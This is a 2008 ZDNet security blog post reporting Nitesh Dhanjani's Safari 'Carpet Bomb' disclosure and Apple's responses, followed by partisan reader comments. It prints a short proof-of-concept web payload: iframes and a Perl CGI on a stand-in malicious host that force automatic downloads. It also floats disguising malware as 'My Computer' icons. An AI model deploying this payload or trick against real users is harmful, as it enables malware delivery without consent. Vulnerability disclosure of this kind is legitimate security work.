Topic: Operating Systems

Safari "Carpet Bomb" attack information released

Summary: Nitesh Dhanjani released information about some of his newest research on the Safari web browser this morning, and interestingly enough, Apple has decided NOT to fix some of the issues he presented.Dhanjani reported three issues, as follows below from his blog:1.

By Nathan McFeters for Zero Day | May 15, 2008 -- 07:28 GMT (00:28 PDT)

Nitesh Dhanjani released information about some of his newest research on the Safari web browser this morning, and interestingly enough, Apple has decided NOT to fix some of the issues he presented.

Dhanjani reported three issues, as follows below from his blog:

1. Safari Carpet Bomb.It is possible for a rogue website to litter the user's Desktop (Windows) or Downloads directory (~/Downloads/ in OSX). This can happen because the Safari browser cannot be configured to obtain the user's permission before it downloads a resource. Safari downloads the resource without the user's consent and places it in a default location (unless changed).

Assume you visit a malicious site, http://malicious.example.com/, that serves the following HTML:

<HTML> <iframe id="frame" src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi" mce_src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe> <iframe id="frame" src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi" mce_src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe> <iframe id="frame" src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi" mce_src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe> ... <iframe id="frame" src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi" mce_src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe> </HTML>

Now assume that http://malicious.example.com/cgi-bin/carpet_bomb.cgi is the following: #!/usr/bin/perl print "Content-type: blah/blah\n\n" Since Safari does not know how to render content-type of blah/blah, it will automatically start downloading carpet_bomb.cgi every time it is served. If you are using Safari in Windows, this is what will happen to your desktop once you visit http://malicious.example.com/:

The implication of this is obvious: Malware downloaded to the user's desktop without the user's consent.

Apple does not feel this is a issue they want to tackle at this time.

In my most recent email to Apple, I suggested that they incorporate an option in Safari so the browser can be configured to ask the user before anything is downloaded to the local file system. Apple agreed it was a good suggestion:

...the ability to have a preference to "Ask me before downloading anything" is a good suggestion. We can file that as an enhancement request for the Safari team. Please note that we are not treating this as a security issue, but a further measure to raise the bar against unwanted downloads. This will require a review with the Human Interface team. We want to set your expectations that this could take quite a while, if it ever gets incorporated.

[credit to BK have-it-your-way Rios for suggesting the term "Carpet Bomb" to describe this issue].

Let's hope Apple does add the suggestion Nitesh mentioned at least. I see this as a major security issue. Unless I'm off the mark, someone could create a piece of Malware, call it "My Computer", give it an icon that looked just like the "My Computer" icon, and litter it all over someone's desktop. My guess is that more than a few people would double click that, making this a serious issue.

Click read more below to read the rest...

Nitesh continues:

2. Sandbox not Applied to Local Resources. This issue is more of a feature set request than a vulnerability. For example, Internet Explorer warns users when a local resource such as an HTML file attempts to invoke client side scripting. I feel this is an important security feature because of user expectations: even the most sophisticated users differentiate between the risk of clicking on an executable they have downloaded (risk perceived to be higher) to clicking on a HTML file they have downloaded (risk perceived to be lower).

Apple's response was positive: ...we have been investigating the potential for a "safe" mode for local HTML. This is an area that requires a fairly deep investigation to address compatibility issues, and to determine the proper operation. Please understand that when we label this as a security hardening measure, we are not discounting the benefits that this could have.

Ok, with this one I'm happy with Apple's response and agree with their plan of action.

3. [Undisclosed]. The third issue I reported to Apple is a high risk vulnerability in Safari that can be used to remotely steal local files from the user's file system. Apple responded positively and let me know that they are actively working to resolve the issue and issue a patch. I will post an update if I hear back from them.

I'd like to thank the Apple security team for their timely responses and for letting me discuss these issues with the security community.

Apple's stance on some of these issues is concerning. For now, I'm forgoing my research on the Mac OS X because I'm afraid Nitesh is going to pwn my box.

-Nate

Topics: Operating Systems, Apple, Security

Kick off your day with ZDNet's daily email newsletter. It's the freshest tech news and opinion, served hot. Get it.

Talkback

37 comments

Log in or register to join the discussion

Apple products are very secure

If I were Apple I would just not worry about this because as many Apple software users know, they are secure as secure can be. I would just laugh this guy off because the perception is in play in the market and who needs to mess with a perception when it trumps reality. There aren't many Apple users that would pony up the truth about security issues from Apple, because we all know security issues in software only applies to Microsoft products. Just be quiet and everything will go just fine.

OhTheHumanity
15 May, 2008 08:12

Reply Vote
- Just let this strawman die, already
  
  Since no Mac user ever maintains what you think they do,
  you just look like a pathetic fool every time you and others
  like you bring it up.
  
  frgough
  15 May, 2008 08:50
  
  Reply Vote
  - As long as you don't use it the next time ...
    
    ... a Windows security issue is in the news.
    
    Confused by religion
    15 May, 2008 09:27
    
    Reply Vote
    - The zombie strawman
      
      MS apologists are the only ones who run around claiming
      Mac users state OS X is perfect.
      
      frgough
      15 May, 2008 11:50
      
      Reply Vote
- OS X fell first in the Pwn2Own because of Safari
  
  Safari is an abomination.
  
  1. An OS X box was owned within 2 minutes of being connected to the Internet because of the swiss cheese nature of Safari.
  
  2. By far the worst font rendering of any application I've ever used.
  
  3. By far the least stable application on my Vista box, I have the reliability logs to prove it.
  
  4. The onl way Apple can get people to use Safari is to bundle it with OS X and perform stealth installs on Windows machines. Pretty disgusting tactics.
  
  NonZealot
  15 May, 2008 12:49
  
  Reply Vote
  - By far the worst font rendering of any application I've ever used
    
    I dis-agree on this point. I don't like Safari, but I think its font rendering is beautiful.
    
    tehremo
    15 May, 2008 14:26
    
    Reply Vote
  - Half the Story
    
    1. Vista fell to Flash. What's your point? All the attacks at Pwn2Own
    were local, and I remind everyone unlike Microsoft XP / Vista there
    has never been a documented remote exploit of OS X.
    
    Even so, the Pwn2Own "hack" was more social engineering than
    "hack". Had an actual human been at the controls it is doubtful the
    "hack" would have worked.
    
    2. Compared to what, ClearType? You do know that Microsoft's
    ClearType is just a re-filed expired Apple patent, right? To be
    exact, an expired patent covering the Apple II. Wow! That's some
    21st Century technology there!
    
    3. Then post them for the world to see, Joe McCarthy.
    
    4. Yes - it is so unlike forcing every hardware manufacturer to buy
    a copy of Windows no matter if the computers ship with it, or not.
    We all know Microsoft would never stoop to such tactics, right?
    
    1macgeek
    16 May, 2008 05:22
    
    Reply Vote
    - @1mackeek -- Vista Fell to Flash
      
      Vista may have fell to flash but the point is that flash is NOT a Microsoft app. Safari is an Apple application which is very concerning. They scream that they have better security. But why did their own application bring their operating system down?
      
      I love Apple just as much as the next guy, but they have got to stop with this "we're more secure" bull crap.
      
      rjohn05
      16 May, 2008 08:03
      
      Reply Vote
      - Agreed
        
        I said it multiple times over, the biggest loser at Pwn2Own was the Mac, but they all lost. When your own software is what gets hit, you can't blame anyone but yourself.
        
        -Nate
        
        nmcfeters
        16 May, 2008 08:52
        
        Reply Vote
      - Flash
        
        Keep in mind that Flash is included and active in a default install so that constitutes part of the standard risk level in my book. From a user standpoint, it doesn't matter who is to blame but whether you're at risk or not.
        
        pecosbill
        16 May, 2008 10:34
        
        Reply Vote
      - Agreed
        
        But Flash is a standard install for a lot of OS, so it's tough to blame M$ for that.
        
        -Nate
        
        nmcfeters
        16 May, 2008 10:52
        
        Reply Vote
    - @1macgeek
      
      You mis-understand things, you said:
      
      1. Vista fell to Flash. What's your point? All the attacks at Pwn2Own were local, and I remind everyone unlike Microsoft XP / Vista there has never been a documented remote exploit of OS X.
      
      Actually, this is a remote exploit. It can be done through cross-site scripting. In fact, all of the attacks used at Pwn2Own are remote. Browser attacks are remote. All it takes is planting the attack on a well visited site with XSS and game over you've hit thousands of users.
      
      You also said:
      Even so, the Pwn2Own "hack" was more social engineering than "hack". Had an actual human been at the controls it is doubtful the
      "hack" would have worked.
      
      That doesn't even make any sense at all. It was a browser attack, no social engineering required. Simply visit a page that deploys the vector. With XSS so widespread, this could be a site you visit every day.
      
      You said:
      2. Compared to what, ClearType? You do know that Microsoft's ClearType is just a re-filed expired Apple patent, right? To be exact, an expired patent covering the Apple II. Wow! That's some 21st Century technology there!
      
      Honestly, and this is not just to you, who gives a fuck about fonts?
      
      -Nate
      
      nmcfeters
      16 May, 2008 08:50
      
      Reply Vote
      - NOT so sure about that it being S. E.
        
        The only thing the human did in Pwn2Own was click a link which could have been served up by a search engine. Did NOT have to come from an email (the SE vector). The rest was all code.
        
        pecosbill
        16 May, 2008 10:43
        
        Reply Vote
      - Didn't even have to click
        
        They wouldn't have had to click if it was deployed through a persistent XSS in a site they visit anyways.
        
        -Nate
        
        nmcfeters
        16 May, 2008 10:53
        
        Reply Vote
  - 2 minutes is pointless!!!!!
    
    On point one, the cracker/hacker [b]CLEARLY[/b] had the exploit already found, set up, and ready to go. Nothing out there can be cracked in two minutes starting from scratch without some additional social engineering.
    
    Safari on OS X 10.5 potentially has less risk due to the messages that pop up (it sees an app and confirms you want to continue downloading plus it confirms new apps that were download should be allowed to run).
    
    Safari on Windows is definitely a critical risk! I have it here and don't plan on using it for any surfing except to gmail. I can see a TRIVIAL exploit as was said. Keep the download to a few icons so it's not too obvious, make it one of the obvious ones (My Comp, recy as said), and you're in. [b]Very Baaaaaaad[/b]. With a little social engineering, you might get a vector on Safari/Win in two minutes!!!!
    
    pecosbill
    16 May, 2008 10:40
    
    Reply Vote
You first (NT)

No text

iPad-awan
15 May, 2008 10:26

Reply Vote
Safari is CRAP. Don't Use It.

Safari is CRAP. I use Firefox on my macbook.

GiveMeGizmos
15 May, 2008 12:17

Reply Vote
one day and 2 minutes, actually. (n/m)

.

lostarchitect
15 May, 2008 15:19

Reply Vote
Why would anyone use safari for windows?

Safari for windows is so primitive, it's worse than lynx or mosaic from 1998. Why anyone would use that is beyond me.. except for the apple fanboys.

kraterz
15 May, 2008 18:25

Reply Vote
- Define primitive then (nt)
  
  [b][/b]
  
  zkiwi
  15 May, 2008 21:20
  
  Reply Vote